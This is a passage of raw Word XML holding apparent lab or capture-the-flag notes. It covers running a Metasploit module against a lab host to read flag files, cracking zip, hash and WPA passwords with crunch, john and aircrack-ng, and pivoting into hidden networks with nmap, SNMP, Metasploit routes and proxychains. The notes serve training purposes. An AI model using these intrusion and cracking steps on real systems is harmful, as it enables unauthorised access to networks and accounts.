      <w:r w:rsidRPr="007524FF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F93D2C3" wp14:editId="25E58B86">
            <wp:extent cx="5940425" cy="1410335"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="31831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980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D1E4" w14:textId="50DBB01B" w:rsidR="002541A9" w:rsidRDefault="002541A9" w:rsidP="00526530">
      <w:r>
        <w:t>use 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7199DD1E" w14:textId="2F2D7F28" w:rsidR="002541A9" w:rsidRDefault="00FD56EE" w:rsidP="00526530">
      <w:r>
        <w:t>options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1ACD39" w14:textId="203935FC" w:rsidR="00FD56EE" w:rsidRDefault="00526EF3" w:rsidP="00526530">
      <w:r w:rsidRPr="00526EF3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DD8B939" wp14:editId="369AE910">
            <wp:extent cx="5940425" cy="3690620"/>
            <wp:effectExtent l="0" t="0" r="3175" b="5080"/>
            <wp:docPr id="139033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3835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EEAB" w14:textId="54042038" w:rsidR="00526EF3" w:rsidRDefault="00FF577D" w:rsidP="00526530">
      <w:r>
        <w:t>set rhosts 10.11.12.75</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBCE42A" w14:textId="08EC4218" w:rsidR="00FF577D" w:rsidRDefault="00FF577D" w:rsidP="00526530">
      <w:r>
        <w:t>set lhost tap0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6320D691" w14:textId="5A4FC150" w:rsidR="00DB2CBD" w:rsidRDefault="00DB2CBD" w:rsidP="00526530">
      <w:r>
        <w:t>run OR exploit OR run -j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708143A2" w14:textId="0D5D50A5" w:rsidR="00DB2CBD" w:rsidRDefault="00713034" w:rsidP="00526530">
      <w:r>
        <w:t>sessions (to list the sessions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C448B8" w14:textId="1B5C34D4" w:rsidR="0086452B" w:rsidRDefault="00713034" w:rsidP="00526530">
      <w:r>
        <w:t>sessions 1</w:t>
      </w:r>
      <w:r w:rsidR="00CD3C8B">
        <w:t xml:space="preserve"> (to select the session)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328E6241" w14:textId="05775D49" w:rsidR="00713034" w:rsidRDefault="00D07AC1" w:rsidP="00526530">
      <w:r>
        <w:t>cat /home/elasticsearch/flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F908483" w14:textId="51AE693D" w:rsidR="00D07AC1" w:rsidRDefault="00D07AC1" w:rsidP="00526530">
      <w:r>
        <w:t>Get the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F10C45" w14:textId="7EF536E4" w:rsidR="00960856" w:rsidRDefault="00960856" w:rsidP="00526530">
      <w:r w:rsidRPr="00960856">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2047B2DB" wp14:editId="512CBC64">
            <wp:extent cx="4258269" cy="1457528"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="3471996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9687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B0F4" w14:textId="26E10D23" w:rsidR="00960856" w:rsidRDefault="00E44974" w:rsidP="00E44974">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>QUESTION 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FD1722" w14:textId="19E1882F" w:rsidR="00713034" w:rsidRDefault="00561153" w:rsidP="00526530">
      <w:r>
        <w:t xml:space="preserve">To get the another flag do `cat /flag.txt` </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15189788" w14:textId="5C8CB03B" w:rsidR="00883E45" w:rsidRDefault="00883E45" w:rsidP="00526530">
      <w:r w:rsidRPr="00883E45">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C51AACA" wp14:editId="55ACDBED">
            <wp:extent cx="2162477" cy="485843"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="22823901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9018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601A" w14:textId="6C5C628D" w:rsidR="007146FF" w:rsidRDefault="007146FF" w:rsidP="007146FF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>MISCELLANEOUS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CCE49E" w14:textId="47EFE819" w:rsidR="007146FF" w:rsidRDefault="007146FF" w:rsidP="007146FF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Cracking zip files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FF28D0" w14:textId="68376D93" w:rsidR="007146FF" w:rsidRDefault="00BB43B5" w:rsidP="007146FF">
      <w:r>
        <w:t>If you have the knowledge about how a password looks like, then you can create a wordlist and then you can crack the stuff with your wordlist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D78EBAE" w14:textId="00A270A2" w:rsidR="00485581" w:rsidRDefault="00485581" w:rsidP="007146FF">
      <w:r>
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidRPr="00485581">
        <w:t>crunch 9 9 0123456789 -t FLAG-%%%% -o pw.txt</w:t>
      </w:r>
      <w:r>
        <w:t>` - generates the variables according to the pattern. % placeholder for number; @ placeholder for letter.</w:t>
      </w:r>
      <w:r w:rsidR="00BF266C">
        <w:t xml:space="preserve"> -o for output to file, -t for type of how it should look like</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2C1DB7" w14:textId="4758D4FB" w:rsidR="00BF266C" w:rsidRDefault="00C92258" w:rsidP="007146FF">
      <w:r w:rsidRPr="00C92258">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35EF7B2C" wp14:editId="40B6665E">
            <wp:extent cx="1276528" cy="1505160"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15850171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7105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8F8E" w14:textId="1CF52991" w:rsidR="00723CAA" w:rsidRDefault="00723CAA" w:rsidP="007146FF">
      <w:r>
        <w:t>John the ripper cannot work with zip files, so we transform it into a “text file”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E76E7BD" w14:textId="1BE4D3E7" w:rsidR="00E3250F" w:rsidRDefault="00E3250F" w:rsidP="007146FF">
      <w:r>
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidRPr="00E3250F">
        <w:t xml:space="preserve"> zip2john protected.zip &gt; zip_hash_file</w:t>
      </w:r>
      <w:r>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45893A9B" w14:textId="7BCD2A88" w:rsidR="00D77E28" w:rsidRDefault="00D77E28" w:rsidP="007146FF">
      <w:r w:rsidRPr="00D77E28">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08E58F62" wp14:editId="38E9430F">
            <wp:extent cx="5940425" cy="2183130"/>
            <wp:effectExtent l="0" t="0" r="3175" b="7620"/>
            <wp:docPr id="16739389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38923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C941" w14:textId="55089417" w:rsidR="00D77E28" w:rsidRDefault="00D77E28" w:rsidP="007146FF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>And we get the password and the contents.</w:t>
      </w:r>
      <w:r w:rsidR="00772857">
        <w:t xml:space="preserve"> (probably)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F9F650" w14:textId="55806BD7" w:rsidR="004A445E" w:rsidRDefault="004A445E" w:rsidP="004A445E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Cracking hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746FDCFA" w14:textId="44E74D55" w:rsidR="004A445E" w:rsidRDefault="00E0740E" w:rsidP="007146FF">
      <w:r>
        <w:t>Put the hash you want in a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF72903" w14:textId="62E40B8D" w:rsidR="003779E9" w:rsidRDefault="003779E9" w:rsidP="007146FF">
      <w:r>
        <w:t>Then use command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C419688" w14:textId="503121BC" w:rsidR="003779E9" w:rsidRDefault="003779E9" w:rsidP="007146FF">
      <w:r>
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidRPr="003779E9">
        <w:t xml:space="preserve"> john ftpuser_hash --wordlist=pw.txt --format=crypt</w:t>
      </w:r>
      <w:r>
        <w:t>` (the last one is important)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D39110B" w14:textId="57AC4B7E" w:rsidR="00797F70" w:rsidRDefault="00797F70" w:rsidP="007146FF">
      <w:r>
        <w:t>Then start, wait a bit, and then you can run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B049FD8" w14:textId="6F1AD83A" w:rsidR="00797F70" w:rsidRDefault="00797F70" w:rsidP="007146FF">
      <w:r>
        <w:t xml:space="preserve">`john ftpuser_hash </w:t>
      </w:r>
      <w:r w:rsidR="00CD3B9C">
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>show` OR `john --show ftpuser`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3825172D" w14:textId="73EB39E6" w:rsidR="00BB43B5" w:rsidRDefault="006C6219" w:rsidP="007146FF">
      <w:r w:rsidRPr="006C6219">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22191049" wp14:editId="283A6388">
            <wp:extent cx="5940425" cy="2516505"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="53237949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79499" name="Picture 1" descr="A computer screen shot of a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2905" w14:textId="3D8A2DB6" w:rsidR="00567372" w:rsidRDefault="00567372" w:rsidP="00567372">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Cracking pcap files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56235485" w14:textId="6C8A8782" w:rsidR="00567372" w:rsidRDefault="000E653F" w:rsidP="007146FF">
      <w:r>
        <w:t>`aircrack-ng -w pw.txt wificap-01.pcap`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBE2831" w14:textId="42A76003" w:rsidR="000E653F" w:rsidRDefault="00D11091" w:rsidP="007146FF">
      <w:r>
        <w:t>Select the network, get the password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFC139B" w14:textId="176B8BC1" w:rsidR="00D11091" w:rsidRDefault="00D11091" w:rsidP="007146FF">
      <w:r>
        <w:t xml:space="preserve">Open wireshark, then Edit &gt; Preferences &gt; Protocols &gt; IEEE 802.11 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2663E796" w14:textId="6C464132" w:rsidR="00D11091" w:rsidRDefault="00D11091" w:rsidP="007146FF">
      <w:r>
        <w:t>Decryption keys &gt; Edit + wpa_pwd and key. And save</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57986E3F" w14:textId="6094F34B" w:rsidR="00D11091" w:rsidRDefault="00D11091" w:rsidP="007146FF">
      <w:r>
        <w:t>Now you can see HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361D12E1" w14:textId="5D3BFAB3" w:rsidR="00275FFD" w:rsidRDefault="00275FFD" w:rsidP="00275FFD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Pivoting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487B317F" w14:textId="11517FB3" w:rsidR="005B39AF" w:rsidRDefault="005B39AF" w:rsidP="005B39AF">
      <w:r>
        <w:t>What is pivoting? Imagine you have a network, and in this network you have another machine with a different IP address. Like we have with 10.11.12. , but another network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BB1B92" w14:textId="1E1AD31B" w:rsidR="005B39AF" w:rsidRDefault="005B39AF" w:rsidP="005B39AF">
      <w:r>
        <w:t>You want to first know what is your current network where you are working.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782C1761" w14:textId="1BBF0232" w:rsidR="00C72D8A" w:rsidRDefault="00C72D8A" w:rsidP="005B39AF">
      <w:r>
        <w:t>It is also important to know the routers, or default routers. To do that try `ip r`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3120E132" w14:textId="07539596" w:rsidR="009840CD" w:rsidRDefault="009840CD" w:rsidP="005B39AF">
      <w:r>
        <w:t>What you then want to do is try to do a pingsweep over the network that you find, like `sudo nmap -sn 192.168.206.0/24` and then see what you get.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA47784" w14:textId="5F62749D" w:rsidR="00F43012" w:rsidRDefault="00F43012" w:rsidP="005B39AF">
      <w:r>
        <w:t>The moment you find other machines that are up, you can check what they have inside of themselves with `nmap -sV`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F255CD4" w14:textId="1BCDB1AA" w:rsidR="00832E12" w:rsidRDefault="00832E12" w:rsidP="005B39AF">
      <w:r>
        <w:t>After that, can try to look for SNMP services running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6652AD7A" w14:textId="08096551" w:rsidR="00832E12" w:rsidRDefault="00832E12" w:rsidP="005B39AF">
      <w:r>
        <w:t>`sudo nmap -sV 192.168.206.137 -sU -p161</w:t>
      </w:r>
      <w:r w:rsidR="006E7AD8">
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0FAD66" w14:textId="66B37E4E" w:rsidR="006E7AD8" w:rsidRDefault="006E7AD8" w:rsidP="005B39AF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>After that, if you have any SNMP running, you can check the snmpwalk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43983B8D" w14:textId="71E2A31A" w:rsidR="006E7AD8" w:rsidRDefault="006E7AD8" w:rsidP="005B39AF">
      <w:r>
        <w:t>`snmpwalk -v1 -c public 192.168.32.173 | grep IpAddress`</w:t>
      </w:r>
      <w:r w:rsidR="00BF7537">
        <w:t xml:space="preserve"> (-v1 for the version that you find on the services, -c for password, most common one is public)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CABADAB" w14:textId="341691B5" w:rsidR="000F05EC" w:rsidRDefault="000F05EC" w:rsidP="005B39AF">
      <w:r>
        <w:t>The moment you see something like `iso.3.6……/20.1.1.10.0.0.1`, that means that the last 4 hexes represent another IP address or possible network that is hidden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071188DB" w14:textId="3ECEE8B8" w:rsidR="000F05EC" w:rsidRDefault="000F05EC" w:rsidP="005B39AF">
      <w:r>
        <w:t>You can run `nmap 192.168.206.137 -sU -p161 --script=</w:t>
      </w:r>
      <w:r w:rsidR="008356AF">
        <w:t>snmp-interfaces` and this might give you a representation of what are the interfaces connected to a machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CE1DCD" w14:textId="2B3D84DE" w:rsidR="0044413E" w:rsidRDefault="0044413E" w:rsidP="005B39AF">
      <w:r>
        <w:t xml:space="preserve">Then we want to get access to that network, so we can add a route manually, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28974AD0" w14:textId="4374C6B1" w:rsidR="0044413E" w:rsidRDefault="0044413E" w:rsidP="005B39AF">
      <w:r>
        <w:t>`ip route add 10.0.0.0/24 via 192.168.32.137` (so you specify the network you want to go to, via the specific address where you know stuff is connected to.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF6705F" w14:textId="7FF1BC8F" w:rsidR="002F1377" w:rsidRDefault="002F1377" w:rsidP="005B39AF">
      <w:r>
        <w:t xml:space="preserve">Then you can run an pingsweep on that network to understand what is </w:t>
      </w:r>
      <w:r w:rsidR="002324C9">
        <w:t>up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D51AB2" w14:textId="00678CAE" w:rsidR="002324C9" w:rsidRDefault="002324C9" w:rsidP="005B39AF">
      <w:r>
        <w:t>`sudo nmap -sn 10.0.0.0/24`</w:t>
      </w:r>
      <w:r w:rsidR="00992109">
        <w:br/>
        <w:t>Then, based on the IP addresses you find, you can look for services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F7E29C" w14:textId="008C1C7F" w:rsidR="003E3D1A" w:rsidRDefault="003E3D1A" w:rsidP="005B39AF">
      <w:r>
        <w:t xml:space="preserve">You can also do Metasploit </w:t>
      </w:r>
      <w:r w:rsidR="003026F9">
        <w:t xml:space="preserve">pivoting, in case you connected to another PC that also has some network connected to it. So after doing that, you can </w:t>
      </w:r>
      <w:r w:rsidR="005C591D">
        <w:t>add route in the session to get other computers or IP addresses</w:t>
      </w:r>
      <w:r w:rsidR="00EE40C9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2745B8" w14:textId="33B71929" w:rsidR="005C591D" w:rsidRDefault="005C591D" w:rsidP="005B39AF">
      <w:r>
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidR="00D46D33">
        <w:t>route add 10.0.1.0/24 1`</w:t>
      </w:r>
      <w:r w:rsidR="004C059F">
        <w:t xml:space="preserve"> (ip address and session number)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E46A6C6" w14:textId="166D12BE" w:rsidR="006E0D61" w:rsidRDefault="006E0D61" w:rsidP="005B39AF">
      <w:r>
        <w:t>Then look for command ping_sweep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251FC2F5" w14:textId="71A5DFBB" w:rsidR="006E0D61" w:rsidRDefault="006E0D61" w:rsidP="005B39AF">
      <w:r>
        <w:t>`search ping_sweep` &amp;&amp; `use 0`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B695B9" w14:textId="090BF210" w:rsidR="006E0D61" w:rsidRDefault="00DB7EEE" w:rsidP="005B39AF">
      <w:r>
        <w:t>Show options, and set the rhosts to the network, and the session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ED01AF" w14:textId="61B075D8" w:rsidR="00DB7EEE" w:rsidRDefault="00DB7EEE" w:rsidP="005B39AF">
      <w:r>
        <w:t>`set rhosts 10.0.1.0/24`</w:t>
      </w:r>
      <w:r w:rsidR="007654A7">
        <w:t>or can make it smaller `10.0.1.1-20`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000DD132" w14:textId="145B8721" w:rsidR="007654A7" w:rsidRDefault="00687660" w:rsidP="005B39AF">
      <w:r>
        <w:t>`set session 1`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6886A3A7" w14:textId="640029F9" w:rsidR="00687660" w:rsidRDefault="00687660" w:rsidP="005B39AF">
      <w:r>
        <w:t>`run`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A768B50" w14:textId="046307EC" w:rsidR="00687660" w:rsidRDefault="00687660" w:rsidP="005B39AF">
      <w:r>
        <w:t>And then you might get some IP addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5CB102" w14:textId="0212142B" w:rsidR="00F32BC7" w:rsidRDefault="00F32BC7" w:rsidP="005B39AF">
      <w:r>
        <w:t>If you have a meterpreter session, then you can make use of proxychain to get access to another network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4A3F59" w14:textId="2648FD7F" w:rsidR="005A57D6" w:rsidRDefault="005A57D6" w:rsidP="005B39AF">
      <w:r>
        <w:t>So while you have a session, search `socks` and then use the one with `socks_proxy`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635CBF59" w14:textId="54EAD176" w:rsidR="004F55A1" w:rsidRDefault="004F55A1" w:rsidP="005B39AF">
      <w:r>
        <w:t>See `options` and mostly there is nothing else to do.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3DD801" w14:textId="7FF50B98" w:rsidR="00A341A7" w:rsidRDefault="00A341A7" w:rsidP="005B39AF">
      <w:r>
        <w:t>Then we need to have proxychains on our machine (sudo apt install proxychains-ng) and then go to /etc/proxychains4.conf and change the line with socks4 to socks5 127.0.0.1 1080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EC8B79" w14:textId="33F79877" w:rsidR="00BE1D4F" w:rsidRDefault="00BE1D4F" w:rsidP="005B39AF">
      <w:r>
        <w:t>After that do `proxychains nmap -Pn -sT -p80</w:t>
      </w:r>
      <w:r w:rsidR="00360780">
        <w:t xml:space="preserve"> 10.0.1.12-22</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (-Pn to avoid ping, -sT to use TCP, because does not support UDP and etc.</w:t>
      </w:r>
      <w:r w:rsidR="00360780">
        <w:t>, port 80, and to look for the hosts from 12 up to 22</w:t>
      </w:r>
      <w:r w:rsidR="0006533E">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2489C230" w14:textId="69F6F34B" w:rsidR="00D46D33" w:rsidRPr="005B39AF" w:rsidRDefault="0034147C" w:rsidP="005B39AF">
      <w:r>
        <w:t>Then you can run `proxychains firefox` and like have a proxy to the other network.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00D46D33" w:rsidRPr="005B39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9BD"/>
    <w:rsid w:val="00014509"/>
    <w:rsid w:val="0003449B"/>
    <w:rsid w:val="00046399"/>
    <w:rsid w:val="000540E2"/>
    <w:rsid w:val="0006533E"/>
    <w:rsid w:val="00085A44"/>
    <w:rsid w:val="00086CBF"/>
    <w:rsid w:val="00095077"/>
    <w:rsid w:val="000D73E5"/>
    <w:rsid w:val="000D79FA"/>
    <w:rsid w:val="000E001F"/>
    <w:rsid w:val="000E4D23"/>
    <w:rsid w:val="000E653F"/>
    <w:rsid w:val="000E7117"/>
    <w:rsid w:val="000F05EC"/>
    <w:rsid w:val="000F141E"/>
    <w:rsid w:val="000F6D07"/>
    <w:rsid w:val="00134CE4"/>
    <w:rsid w:val="0013781B"/>
    <w:rsid w:val="00140525"/>
    <w:rsid w:val="00150841"/>
    <w:rsid w:val="00154B4D"/>
    <w:rsid w:val="001611F7"/>
    <w:rsid w:val="00162028"/>
    <w:rsid w:val="00163C4C"/>
    <w:rsid w:val="00164A04"/>
    <w:rsid w:val="00165F84"/>
    <w:rsid w:val="00187740"/>
    <w:rsid w:val="001C0EC2"/>
    <w:rsid w:val="001E167A"/>
    <w:rsid w:val="001E5CFB"/>
    <w:rsid w:val="00230C57"/>
    <w:rsid w:val="002324C9"/>
    <w:rsid w:val="002366CC"/>
    <w:rsid w:val="002541A9"/>
    <w:rsid w:val="002555FC"/>
    <w:rsid w:val="00275FFD"/>
    <w:rsid w:val="00283B2E"/>
    <w:rsid w:val="00293D2D"/>
    <w:rsid w:val="002A0A8C"/>
    <w:rsid w:val="002C4BB4"/>
    <w:rsid w:val="002C659E"/>
    <w:rsid w:val="002F1377"/>
    <w:rsid w:val="003026F9"/>
    <w:rsid w:val="003111D7"/>
    <w:rsid w:val="00321097"/>
    <w:rsid w:val="00321400"/>
    <w:rsid w:val="003278E3"/>
    <w:rsid w:val="0034147C"/>
    <w:rsid w:val="00360780"/>
    <w:rsid w:val="003779E9"/>
    <w:rsid w:val="003950D0"/>
    <w:rsid w:val="003A4DEF"/>
    <w:rsid w:val="003B05D5"/>
    <w:rsid w:val="003E3D1A"/>
    <w:rsid w:val="00415C9F"/>
    <w:rsid w:val="004353CD"/>
    <w:rsid w:val="0044413E"/>
    <w:rsid w:val="00456EFA"/>
    <w:rsid w:val="00481F72"/>
    <w:rsid w:val="00485581"/>
    <w:rsid w:val="00490AB5"/>
    <w:rsid w:val="00497911"/>
    <w:rsid w:val="004A445E"/>
    <w:rsid w:val="004B61E1"/>
    <w:rsid w:val="004C059F"/>
    <w:rsid w:val="004F504D"/>
    <w:rsid w:val="004F55A1"/>
    <w:rsid w:val="00515B13"/>
    <w:rsid w:val="00521A62"/>
    <w:rsid w:val="00526530"/>
    <w:rsid w:val="00526EF3"/>
    <w:rsid w:val="00561153"/>
    <w:rsid w:val="00567372"/>
    <w:rsid w:val="005A57D6"/>
    <w:rsid w:val="005B39AF"/>
    <w:rsid w:val="005B7CB7"/>
    <w:rsid w:val="005C591D"/>
    <w:rsid w:val="005D7368"/>
    <w:rsid w:val="00602047"/>
    <w:rsid w:val="00622293"/>
    <w:rsid w:val="00687660"/>
    <w:rsid w:val="006C6219"/>
    <w:rsid w:val="006D516C"/>
    <w:rsid w:val="006E0D61"/>
    <w:rsid w:val="006E7AD8"/>
    <w:rsid w:val="006F2A1D"/>
    <w:rsid w:val="00713034"/>
    <w:rsid w:val="007146FF"/>
    <w:rsid w:val="00723CAA"/>
    <w:rsid w:val="007524FF"/>
    <w:rsid w:val="00753F56"/>
    <w:rsid w:val="007654A7"/>
    <w:rsid w:val="00772857"/>
    <w:rsid w:val="00773894"/>
    <w:rsid w:val="00774868"/>
    <w:rsid w:val="0077691C"/>
    <w:rsid w:val="00797C72"/>
    <w:rsid w:val="00797F70"/>
    <w:rsid w:val="007C7978"/>
    <w:rsid w:val="007D00D7"/>
    <w:rsid w:val="007D74E4"/>
    <w:rsid w:val="007E1307"/>
    <w:rsid w:val="007F6147"/>
    <w:rsid w:val="008166B9"/>
    <w:rsid w:val="008275A6"/>
    <w:rsid w:val="00832E12"/>
    <w:rsid w:val="00832FAF"/>
    <w:rsid w:val="008356AF"/>
    <w:rsid w:val="0086075A"/>
    <w:rsid w:val="0086452B"/>
    <w:rsid w:val="00880D7F"/>
    <w:rsid w:val="00881B4F"/>
    <w:rsid w:val="00883E45"/>
    <w:rsid w:val="008945A4"/>
    <w:rsid w:val="008973CE"/>
    <w:rsid w:val="008A37F5"/>
    <w:rsid w:val="008E2EBF"/>
    <w:rsid w:val="00905666"/>
    <w:rsid w:val="00920D45"/>
    <w:rsid w:val="00960856"/>
    <w:rsid w:val="00980276"/>
    <w:rsid w:val="009840CD"/>
    <w:rsid w:val="00986335"/>
    <w:rsid w:val="009868BE"/>
    <w:rsid w:val="00992109"/>
    <w:rsid w:val="009F2CFE"/>
    <w:rsid w:val="00A01325"/>
    <w:rsid w:val="00A149BD"/>
    <w:rsid w:val="00A31655"/>
    <w:rsid w:val="00A341A7"/>
    <w:rsid w:val="00A369FB"/>
    <w:rsid w:val="00A51C3B"/>
    <w:rsid w:val="00A6090B"/>
    <w:rsid w:val="00A62D05"/>
    <w:rsid w:val="00A94E92"/>
    <w:rsid w:val="00AD0167"/>
    <w:rsid w:val="00AD51C7"/>
    <w:rsid w:val="00AD6FAF"/>
    <w:rsid w:val="00AF0CAA"/>
    <w:rsid w:val="00AF1641"/>
    <w:rsid w:val="00AF758E"/>
    <w:rsid w:val="00B0695A"/>
    <w:rsid w:val="00B35CF3"/>
    <w:rsid w:val="00B41784"/>
    <w:rsid w:val="00B50A1E"/>
    <w:rsid w:val="00B52357"/>
    <w:rsid w:val="00B63947"/>
    <w:rsid w:val="00B823DE"/>
    <w:rsid w:val="00B97BC4"/>
    <w:rsid w:val="00BA2CC9"/>
    <w:rsid w:val="00BB43B5"/>
    <w:rsid w:val="00BB60D1"/>
    <w:rsid w:val="00BC3C7A"/>
    <w:rsid w:val="00BD53C8"/>
    <w:rsid w:val="00BE1D4F"/>
    <w:rsid w:val="00BF163E"/>
    <w:rsid w:val="00BF266C"/>
    <w:rsid w:val="00BF5850"/>
    <w:rsid w:val="00BF7537"/>
    <w:rsid w:val="00BF7C30"/>
    <w:rsid w:val="00C42E4D"/>
    <w:rsid w:val="00C56309"/>
    <w:rsid w:val="00C72D8A"/>
    <w:rsid w:val="00C83BDA"/>
    <w:rsid w:val="00C86180"/>
    <w:rsid w:val="00C92258"/>
    <w:rsid w:val="00CA6825"/>
    <w:rsid w:val="00CA6BD3"/>
    <w:rsid w:val="00CD3B9C"/>
    <w:rsid w:val="00CD3C8B"/>
    <w:rsid w:val="00CE16E8"/>
    <w:rsid w:val="00CE6146"/>
    <w:rsid w:val="00D07AC1"/>
    <w:rsid w:val="00D11091"/>
    <w:rsid w:val="00D24E84"/>
    <w:rsid w:val="00D312D0"/>
    <w:rsid w:val="00D35C8A"/>
    <w:rsid w:val="00D4661D"/>
    <w:rsid w:val="00D46D33"/>
    <w:rsid w:val="00D54CE2"/>
    <w:rsid w:val="00D61445"/>
    <w:rsid w:val="00D61E8B"/>
    <w:rsid w:val="00D70140"/>
    <w:rsid w:val="00D7017B"/>
    <w:rsid w:val="00D76AAF"/>
    <w:rsid w:val="00D77E28"/>
    <w:rsid w:val="00D83421"/>
    <w:rsid w:val="00DB2CBD"/>
    <w:rsid w:val="00DB7B10"/>
    <w:rsid w:val="00DB7EEE"/>
    <w:rsid w:val="00DE2038"/>
    <w:rsid w:val="00E05608"/>
    <w:rsid w:val="00E0740E"/>
    <w:rsid w:val="00E17CFB"/>
    <w:rsid w:val="00E24279"/>
    <w:rsid w:val="00E3250F"/>
    <w:rsid w:val="00E40A83"/>
    <w:rsid w:val="00E44974"/>
    <w:rsid w:val="00E45BBC"/>
    <w:rsid w:val="00EA6E28"/>
    <w:rsid w:val="00EC788B"/>
    <w:rsid w:val="00ED0738"/>
